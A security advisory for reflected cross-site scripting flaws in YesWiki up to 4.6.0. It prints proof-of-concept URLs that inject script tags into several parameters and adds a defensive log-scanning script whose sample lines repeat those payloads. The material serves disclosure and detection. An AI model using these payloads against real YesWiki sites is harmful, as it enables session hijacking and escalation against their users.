
YesWiki: Malicious JavaScript can be injected via URLs

GHSA-5724-x3rh-5qqq
Summary

YesWiki has a security flaw that allows malicious code to be injected into a user's browser when they visit a specially crafted URL. This could lead to unauthorized access to sensitive information or other security risks. To fix this, update YesWiki to the latest version or use a secure proxy to filter out malicious URLs.

What to do
  • Update yeswiki/yeswiki to version 4.6.0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| yeswiki | yeswiki | <= 4.6.0 | 4.6.0 |
Original title
YesWiki has Multiple Reflected Cross-site Scripting Vulnerabilities
Original description
### Summary

Multiple **reflected Cross-site Scripting (XSS)** vulnerabilities across both **authenticated and unauthenticated** portions of the application. These findings present a significant security risk, as they can be leveraged to execute arbitrary JavaScript in a victim’s browser under various contexts.

## Impact and Exploitation

While XSS is often treated as a standalone issue, these vulnerabilities have broader implications. Specifically, they can be used as **launch points to exploit other significant vulnerabilities**.

Proof of concept links follow. All testing was performed on my local Docker setup running the latest version of the application.

## Proof of Concepts

## Authenticated Reflected XSS

```
http://localhost:8085/?ElizabethJFeinler/deletepage&incomingurl=%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E
```

```
http://localhost:8085/?BazaR&vue=saisir&action=saisir_fiche&id=%3Cscript%3Ealert(1)%3C%2fscript%3E
```

```
http://localhost:8085/?GererThemes/upload&file=%3Cscript%3Ealert(1)%3C/script%3E
```

## Unauthenticated Reflected XSS


```
http://localhost:8085/?PagePrincipale/listpages&tags=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
```

In this one, most of the parameters can be used to deliver an XSS payload, not just the template parameter.

```
http://localhost:8085/?BazaR/bazariframe&id=2&template=<script>alert(1)</script>&width=100%25&height=600px&lat=46.22763&lon=2.213749&markersize=big&provider=MapBox&zoom=5&groups=&titles=&groupsexpanded=false
```

### Impact

The reflected XSS vulnerabilities identified pose a significant risk to both application integrity and user safety. When combined with other issues discovered, such as insecure endpoints or improper authentication mechanisms, these XSS flaws can be leveraged to escalate access, hijack sessions, and in some cases, achieve remote code execution (RCE). For example, malicious JavaScript executed via XSS could be used to trigger authenticated requests that exploit backend vulnerabilities, ultimately allowing an attacker to execute arbitrary commands on the server or pivot deeper into the environment.

### Mitigation
Update to version 4.6.0
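
For triage before or after upgrading, the following added example (not part of the advisory or of YesWiki's code) scans web-server access logs for requests whose query values decode to HTML markup, the pattern every proof-of-concept URL above shares. The log lines are constructed samples, and the function names and combined-log-format assumption are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that let a reflected value close an attribute or open a tag.
HTML_BREAKOUT = re.compile(r'[<>"]')
# Request target inside a combined-log-format request line (assumed format).
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so double-encoded values are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(request_target):
    """Return [(name, decoded_value)] for query values that contain markup."""
    query = urlsplit(request_target).query
    hits = []
    # YesWiki's leading "Page/handler" token has no "=", so parse_qsl skips it.
    for name, value in parse_qsl(query):
        decoded = fully_decode(value)
        if HTML_BREAKOUT.search(decoded):
            hits.append((name, decoded))
    return hits

def scan(log_lines):
    """Return [(line_number, name, decoded_value)] across an access log."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)):
                findings.append((number, name, value))
    return findings

# Constructed sample log: client addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2026:10:00:00 +0000] "GET /?PagePrincipale HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Apr/2026:10:00:05 +0000] "GET /?PagePrincipale/listpages&tags=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4211',
    '203.0.113.9 - - [01/Apr/2026:10:01:00 +0000] "GET /?BazaR/bazariframe&id=2&template=map&width=100%25&height=600px HTTP/1.1" 200 3010',
    '203.0.113.9 - - [01/Apr/2026:10:01:09 +0000] "GET /?BazaR&vue=saisir&action=saisir_fiche&id=%3Cscript%3Ealert(1)%3C%2fscript%3E HTTP/1.1" 200 2999',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit is a triage signal rather than proof of exploitation, since legitimate values can contain a double quote; the fix remains the upgrade to 4.6.0.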
GHSA CVSS 4.0 score: 5.3
Vulnerability type
CWE-79 Cross-site Scripting (XSS)
Published: 1 Apr 2026 · Updated: 1 Apr 2026 · First seen: 1 Apr 2026